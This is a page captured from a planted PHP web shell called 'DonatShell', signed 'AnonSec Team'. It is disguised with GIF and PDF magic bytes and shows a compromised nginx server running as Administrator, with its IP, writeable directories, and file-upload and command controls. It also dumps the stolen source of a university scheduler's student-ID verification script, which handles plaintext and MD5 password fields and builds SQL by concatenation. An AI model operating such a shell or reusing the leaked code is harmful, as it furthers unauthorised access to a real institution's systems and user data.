GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/User db/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/User db/userStudentIdVerify.phpinc
<?
// Login/userStudentIdVerify.phpinc

if ($DEBUG_AuthenticateUser) echo "<b>".basename(__FILE__).":".__LINE__.":</b><br>\n";
t_Begin();
// This is a userStudentId verification.
$f_error = "";
// Verify f_userStudentId

if ( $f_form == 'form_userStudentId' ) {
	$f_userStudentId = formValue('userStudentId');
	if ($f_userStudentId == '') {
		// The userStudentId is blank.
			$f_error = "The Student ID # information is incorrect.";
			$f_userStudentIdError = 'The Student ID # is blank. Please enter your Student ID # in the format: 00000000. Where 00000000 is your eight digit student ID #.';
	} else {
		if (!preg_match("/^[0-9]{8}$/i",$f_userStudentId)) {
			// The userStudentId is not in the correct format.
				$f_error = "The Student ID # information is incorrect.";
				$f_userStudentIdError = 'The Student ID # is not in the correct format. Please enter your Student ID # in the format: 00000000. Where 00000000 is your eight digit student ID #.';
		}
	}
	// Verify f_userStudentIdVerify
	$f_userStudentIdVerify = formValue('userStudentIdVerify');
	if ($f_userStudentIdVerify != $f_userStudentId) {
		// The userStudentId is not the same as the userStudentIdVerify.
		$f_error = "The Student ID # information is incorrect.";
		$f_userStudentIdVerifyError = 'The Student ID # and Verify Student ID # fields do not match. Please correct your Student ID # and Verify Student ID #.';
	}
	// Verify f_userStudentId not in database.
	if ( !$f_error ) {
		$query = "
					SELECT userId
							 , userUsername
							 , userPassword
							 , userPasswordMD5
							 , userStudentId
							 , userFirstName
							 , userMiddleName
							 , userLastName
							 , userNickname
							 , userDN
							 , userEmail	
						FROM `user`
					 WHERE userStudentId = '".query_safe($f_userStudentId)."'
				ORDER BY userUsername
		";
		$userStudentIdResult = query_do($query);
		$userStudentIdResultCount = $_SESSION['qry']['count'];
		$uniqueStudentID = true;
		if ( $userStudentIdResultCount ) {
			$f_error = "The Student ID # (".$f_userStudentId.") is already in use.";
			$uniqueStudentID = false;
			if ( $userStudentIdResultCount == 1 ) {
				/** /
				xprintQuery('$userStudentIdResult',$userStudentIdResult);
				d_Var('$f_userStudentId',$f_userStudentId);
				d_Var("\$_SESSION['userId']",$_SESSION['userId']);
				d_Var("\$_SESSION['trueuserId']",$_SESSION['trueuserId']);
				d_Var("\$_SESSION['userUsername']",$_SESSION['userUsername']);
				d_Var("\$_SESSION['userStudentId']",$_SESSION['userStudentId']);
				d_Var("\$_SESSION['userFirstName']",$_SESSION['userFirstName']);
				d_Var("\$_SESSION['userEmail']",$_SESSION['userEmail']);
				/**/
				mysqli_data_seek($userStudentIdResult, 0);
				$userRow = mysqli_fetch_assoc($userStudentIdResult);
				#d_Var('$userRow',$userRow);
				if ( $_SESSION['userEmail'] == $userRow['userEmail'] ) {
					$query = "
								SELECT userId
										 , userUsername
										 , userPassword
										 , userPasswordMD5
										 , userStudentId
										 , userFirstName
										 , userMiddleName
										 , userLastName
										 , userNickname
										 , userDN
										 , userEmail	
									FROM `user`
								 WHERE userId = '".query_safe($_SESSION['trueuserId'])."'
					";
					$currentUserResult = query_do($query);
					$currentUserResultCount = $_SESSION['qry']['count'];
					if ( $currentUserResultCount == 1 ) {
						mysqli_data_seek($currentUserResult, 0);
						$currentRow = mysqli_fetch_assoc($currentUserResult);
						#d_Var('$currentRow',$currentRow);
						/**/
						$f_lastModified = currentDateTime();
						$query = "
								UPDATE `user` 
									 SET userUsername = '".query_safe($currentRow['userUsername'])."',
											 userPassword = '".query_safe($currentRow['userPassword'])."',
											 userPasswordMD5 = '".query_safe($currentRow['userPasswordMD5'])."',
											 userFirstName = '".query_safe($currentRow['userFirstName'])."',
											 userLastName = '".query_safe($currentRow['userLastName'])."',
											 userPHPSESSID = '".session_id()."'
								 WHERE userId = ".$userRow['userId']."
						";
						#d_Var('userUpdate',$query,'q');
						$userUpdate = query_do($query);
						// Save current userId.
						$deleteUserId = $_SESSION['trueuserId'];
						// Fix $_SESSION variables.
						$_SESSION['userId'] = $userRow['userId'];
						$_SESSION['trueuserId'] = $userRow['userId'];
						$_SESSION['userUsername'] = $currentRow['userUsername'];
						$_SESSION['userFirstName'] = $userRow['userFirstName'];
						$_SESSION['userFullName'] = trim($userRow['userFirstName'].' '.$userRow['userLastName']);
						$query = "
						SELECT
							userpermission.userpermissionName
						FROM useruserpermission
						LEFT JOIN userpermission ON useruserpermission.userpermissionId = userpermission.userpermissionId
						WHERE useruserpermission.userId = ".$_SESSION['userId']."
						AND userpermission.userpermissionInactive = 0
						ORDER BY userpermission.userpermissionName
						";
						$useruserpermissionResult = query_do($query);
						$useruserpermissionCount = $_SESSION['qry']['count'];
						$_SESSION['userPermissions'] = array();
						$_SESSION['userPermissions'][] = "USER";
						if ($useruserpermissionCount) {
							while ($useruserpermissionRow = mysqli_fetch_assoc($useruserpermissionResult)) {
								$_SESSION['userPermissions'][] = $useruserpermissionRow['userpermissionName'];
							}
						}
						d_Var("\$_SESSION['userPermissions']",$_SESSION['userPermissions']);
						// DELETE current user.
						$query = "
								DELETE
									FROM `user`
								 WHERE userId = ".$deleteUserId."
						";
						#d_Var('userDelete',$query,'q');
						$userDelete = query_do($query);
						$uniqueStudentID = true;
						$f_error = "";
						include('Login/returnFromLogin.phpinc');
						/**/
					}
				}
			}
			if ( !$uniqueStudentID ) {
				// The userStudentId is already in use.
				$f_error = "The Student ID # (".$f_userStudentId.") is already in use.";
				$f_StudentIdAlreadyInUse = true;
				#$f_userStudentIdVerifyError = '<br><span class="error">The Student ID # and Verify Student ID # fields do not match. Please correct your Student ID # and Verify Student ID #.</span>';
			}
		}
	}
} elseif ( $f_form == 'form_userStudentId' ) {
	
} else {
	echo "<b>The form submitted (".$f_form.") is incorrect.</b><br>\n";
	echo "There is a programming error.<br>\n";
	echo "Please contact the site administrator.<br>\n";
	exit;
}

if ($f_error == "") {
	// userStudentId verified, so enter it into the database.
	include("Login/userStudentIdPerform.phpinc");
} else {
	// userStudentId is not verified, so display userStudentId page.
	include("Login/userStudentId.phpinc");
}
t_End();
?>

Anon7 - 2022
AnonSec Team